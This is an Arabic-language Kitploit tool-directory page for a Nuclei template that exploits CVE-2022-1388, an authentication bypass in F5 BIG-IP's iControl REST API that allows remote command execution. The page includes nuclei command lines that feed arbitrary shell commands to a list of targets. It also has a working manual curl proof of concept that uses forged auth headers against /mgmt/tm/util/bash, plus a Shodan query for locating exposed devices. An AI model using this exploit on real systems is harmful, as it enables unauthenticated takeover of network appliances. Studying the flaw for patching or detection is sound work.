Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter — CVE-2022-1388 هي ثغرة تجاوز المصادقة في مكوّن REST الخاص بواجهة iControl API في أجهزة BIG-IP، وقد حصلت على درجة 9.8 في معيار CVSSv3. تُستخدم واجهة iControl REST API لإدارة أجهزة BIG-IP وتهيئتها. يمكن استغلال CVE-2022-1388 من قبل مهاجم غير مصادَق لديه وصول شبكي إلى منفذ الإدارة أو عناوين IP الذاتية للأجهزة التي تستخدم BIG-IP. من شأن استغلال هذه الثغرة أن يسمح للمهاجم بتنفيذ أوامر نظام تعسفية، وإنشاء الملفات وحذفها، وتعطيل الخدمات. | Kitploit
أدوات/GitHubGitHub/mrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubmrcl0wnlab/nuclei-template-exploit-f5-big-ip-icontrol-rest-auth-bypass-rce-command-parameter

Nuclei-Template-Exploit-F5-BIG-IP-iControl-REST-Auth-Bypass-RCE-Command-Parameter

عرض المستودع
618منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2022-1388 هي ثغرة تجاوز المصادقة في مكوّن REST الخاص بواجهة iControl API في أجهزة BIG-IP، وقد حصلت على درجة 9.8 في معيار CVSSv3. تُستخدم واجهة iControl REST API لإدارة أجهزة BIG-IP وتهيئتها. يمكن استغلال CVE-2022-1388 من قبل مهاجم غير مصادَق لديه وصول شبكي إلى منفذ الإدارة أو عناوين IP الذاتية للأجهزة التي تستخدم BIG-IP. من شأن استغلال هذه الثغرة أن يسمح للمهاجم بتنفيذ أوامر نظام تعسفية، وإنشاء الملفات وحذفها، وتعطيل الخدمات.

مشاركة

قالب Nuclei لاستغلال F5 BIG-IP iControl REST لتجاوز المصادقة وتنفيذ الأوامر عن بُعد (RCE) | معامل الأوامر

CVE-2022-1388 هو ثغرة لتجاوز المصادقة في مكوّن REST بواجهة iControl API الخاصة بـ BIG-IP، وقد حصلت على درجة CVSSv3 تبلغ 9.8. تُستخدم واجهة برمجة تطبيقات iControl REST لإدارة و تكوين أجهزة BIG-IP. يمكن استغلال CVE-2022-1388 من قبل مهاجم غير مصادَق يملك وصولًا شبكيًا إلى منفذ الإدارة أو عناوين IP الذاتية للأجهزة التي تستخدم BIG-IP. قد يؤدي الاستغلال إلى تمكين المهاجم من تنفيذ أوامر نظام تعسفية، وإنشاء وحذف الملفات وتعطيل الخدمات.

يستخدم هذا القالب token-spray / متغير CLI الخاص بـ nuclei

يقبل قالب nuclei هذا معامل أوامر (shell parameter) للاستغلال. أردنا اختبار الرموز (tokens) التي تم الحصول عليها من سير عمل آخر أو بحث يدوي، لذلك استخدمنا ميزة متغيرات CLI في nuclei لتغذية هذه القوالب برمز واحد أو قائمة رموز بشكل ديناميكي في وقت التشغيل

-V, -var value custom vars in var=value format

nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=commands.txt
nuclei -l targets.txt -t exploit-CVE-2022-1388.yaml -vv -var CMD=uname -a

Captura de tela de 2022-05-10 01-28-12

إثبات المفهوم (POC) يدويًا

curl -su admin \ 
-H "Host: localhost:8100" \ 
-H "Content-Type: application/json" \ 
-H "Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: a" \ 
-H "Authorization: Basic YWRtaW46" \
 http://{{TARGET_IP}}/mgmt/tm/util/bash \
-d '{"command":"run","utilCmdArgs":"-c id"}'

تفاصيل إضافية

  • https://www.shodan.io/search?query=http.title%3A%22BIG-IP%26reg%3B-+Redirect%22

المراجع

  • https://blog.projectdiscovery.io/nuclei-v2-5-release/
  • https://clouddocs.f5.com/products/big-iq/mgmt-api/v5.4/ApiReferences/bigiq_api_ref/r_auth_login.html
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-1388
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388
  • https://github.com/alt3kx/CVE-2022-1388_PoC
  • https://github.com/dorkerdevil/CVE-2021-22986-Poc/blob/main/README.md
  • https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py
  • https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.y
  • https://github.com/tenable/audit_files/tree/master/cve-2022-1388
  • https://support.f5.com/csp/article/K23605346
  • https://thehackernews.com/2022/05/f5-warns-of-new-critical-big-ip-remote.html
  • https://twitter.com/1ZRR4H/status/1522165718975922178
  • https://www.tenable.com/blog/cve-2022-1388-authentication-bypass-in-f5-big-ipaml
تنزيل الأداة